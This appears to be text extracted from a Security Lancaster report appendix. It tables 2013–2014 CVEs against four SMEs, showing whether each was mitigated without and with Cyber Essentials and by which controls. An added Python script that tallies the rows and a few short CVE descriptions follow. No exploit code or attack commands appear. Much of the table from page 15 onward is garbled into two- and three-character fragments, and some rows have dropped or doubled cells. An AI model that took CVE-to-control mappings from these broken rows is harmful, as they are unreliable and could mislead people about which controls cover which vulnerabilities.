CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don't install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control, Secure Configuration (Cookie deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated | Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated | Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls (include anti-DoS)
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated | Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated | Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated | Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall

Web

site

Bla

cklis

tin

gC

VE

-20

14

-13

42

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Fir

ewal

lW

ebsi

teB

lack

listi

ng

CV

E-2

01

4-1

34

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

Acc

ess

Co

ntr

ol

CV

E-2

01

4-1

35

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

M

alw

are

Pro

tect

ion

P

atch

Man

agem

ent

CV

E-2

01

4-1

37

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Mal

war

eP

rote

ctio

n

Pat

chM

anag

emen

tC

VE

-20

14

-13

79

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-M

alw

are

Pro

tect

ion

P

atch

Man

agem

ent

CV

E-2

01

4-1

37

9n

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

14

-13

82

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

list

Pat

chM

anag

emen

tC

VE

-20

14

-14

66

yn

nn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-1

47

2y

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tP

atch

Man

agem

ent

CV

E-2

01

4-1

47

7y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-15

18

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

56

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-15

65

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

58

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-17

01

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-17

40

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

74

4y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-17

53

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

ampP

atch

Man

agem

ent

CV

E-2

01

4-1

80

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-18

08

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Web

site

Bla

cklis

tin

gamp

Pat

chM

anag

amen

tC

VE

-20

14

-18

11

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

CV

E-2

01

4-1

81

2y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Str

on

gP

assw

ord

s(U

ser

Acc

ess)

CV

E-2

01

4-2

01

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-2

10

3n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

DO

SC

VE

-20

14

-21

09

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agem

ent

CV

E-2

01

4-2

36

4n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-2

41

6n

yy

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-2

55

4n

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

cces

sC

on

tro

lW

ebsi

teB

lack

listi

ng

CV

E-2

01

4-2

64

3n

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-27

42

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

An

tiD

OS

CV

E-2

01

4-2

76

8y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-27

89

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-2

79

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-27

94

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-2

80

8y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-28

21

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-3

44

4n

nn

yn

No

tM

itig

ated

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-34

89

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-35

07

nn

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agem

ent

CV

E-2

01

4-3

55

6y

ny

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-3

58

0y

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

DO

S

Pat

chM

anag

emen

tC

VE

-20

14

-38

14

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-38

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

An

ti-D

os

Fir

mw

are

Up

dat

esC

VE

-20

14

-38

72

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

namp

Pat

chM

anag

emen

tC

VE

-20

14

-40

44

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-40

79

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

08

2y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

00

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

10

5y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

14

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eC

VE

-20

14

-41

27

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

32

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-4

14

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-44

81

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

4-4

61

7y

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-4

63

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

4-6

04

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-6

10

5n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

13

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-6

36

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

69

yn

yy

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

78

nn

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

48

7n

ny

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-7

25

0n

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-7

92

7y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(A

cces

sC

on

tro

l)

Pat

chM

anag

emen

tC

VE

-20

14

-79

45

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-84

47

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-86

38

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-8

83

5y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-9

15

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-A

nti

-Mal

war

eP

atch

Man

agem

ent

[Tim

eD

elay

]C

VE

-20

14

-91

63

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

t[T

ime

Del

ay]

CV

E-2

01

4-9

35

0y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

-Do

sF

irm

war

eU

pd

ates

CV

E-2

01

4-9

35

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

Sec

ure

Co

nfi

gu

rati

on

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
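The table above is only useful once it is tallied: which Cyber Essentials controls carry the mitigation load, and how the outcome with CE relates to how many SMEs reported themselves affected. The script below is an added example, not code from the Security Lancaster report. It assumes the eight-column layout given by the table header (CVE, SME1 to SME4, Idealised, No CE, With CE) and that the With CE cell reads "status - controls", with controls separated by commas or ampersands; the embedded rows are a constructed subset copied from the table.

```python
"""Tally the Cyber Essentials (CE) mitigation table.

Added example, not code from the Security Lancaster report. It parses rows
laid out as in the appendix table (CVE | SME1 | SME2 | SME3 | SME4 |
Idealised | No CE | With CE, with the With-CE cell reading
"<status> - <controls>") and reports which CE controls mitigate the most
CVEs and how the With-CE outcome relates to SME-reported exposure.
"""
import re
from collections import Counter

# Constructed input: eight rows copied from the appendix table above. The
# eight-column layout is assumed from the table header.
SAMPLE_ROWS = """\
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-DoS
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
"""

# "Not Mitigated" must be tried before "Mitigated" or the prefix match wins.
STATUS_RE = re.compile(
    r"^(Not Mitigated|Partially Mitigated|Mitigated)(?:\s*-\s*(.*))?$")


def normalise_control(name):
    """Strip qualifiers such as '(Secure Browser)' or '[Time Delay]' so one
    control is counted once whatever wording a row used."""
    return re.sub(r"\s*[\(\[][^\)\]]*[\)\]]", "", name).strip()


def parse_row(line):
    """Turn one pipe-separated table row into a dict; reject malformed rows
    rather than silently mis-counting them."""
    cells = [c.strip() for c in line.split("|")]
    if len(cells) != 8 or not re.fullmatch(r"CVE-\d{4}-\d{4,}", cells[0]):
        raise ValueError(f"malformed row: {line!r}")
    answers = cells[1:6]
    if any(a not in ("y", "n") for a in answers):
        raise ValueError(f"non-y/n answer in {cells[0]}: {answers}")
    match = STATUS_RE.match(cells[7])
    if match is None:
        raise ValueError(f"unrecognised With-CE cell in {cells[0]}: {cells[7]!r}")
    status, controls_text = match.group(1), match.group(2) or ""
    # Controls in the table are separated by ',' or '&'.
    controls = [normalise_control(c) for c in re.split(r"[,&]", controls_text)]
    return {
        "cve": cells[0],
        "sme": [a == "y" for a in answers[:4]],    # SME1..SME4 affected?
        "idealised": answers[4] == "y",            # idealised SME affected?
        "no_ce": cells[6],
        "with_ce": status,
        "controls": [c for c in controls if c],
    }


def parse_table(text):
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def control_tally(rows):
    """Number of CVEs each CE control helps mitigate (fully or partially)."""
    tally = Counter()
    for row in rows:
        tally.update(set(row["controls"]))
    return tally


def outcome_by_exposure(rows):
    """Per With-CE outcome: how many CVEs, and how many of the SME 'affected'
    answers (at most four per CVE) those CVEs account for."""
    out = {}
    for row in rows:
        bucket = out.setdefault(row["with_ce"], {"cves": 0, "sme_affected_answers": 0})
        bucket["cves"] += 1
        bucket["sme_affected_answers"] += sum(row["sme"])
    return out


if __name__ == "__main__":
    rows = parse_table(SAMPLE_ROWS)
    for control, n in control_tally(rows).most_common():
        print(f"{control:<22} mitigates {n} of {len(rows)} CVEs")
    for status, bucket in outcome_by_exposure(rows).items():
        print(f"{status:<20} {bucket}")
```

Rows that do not fit the expected shape (a missing answer, an unrecognised status) raise rather than being skipped, which is the behaviour you want when the table was recovered from a PDF and may contain rows with a dropped or doubled cell.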

CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

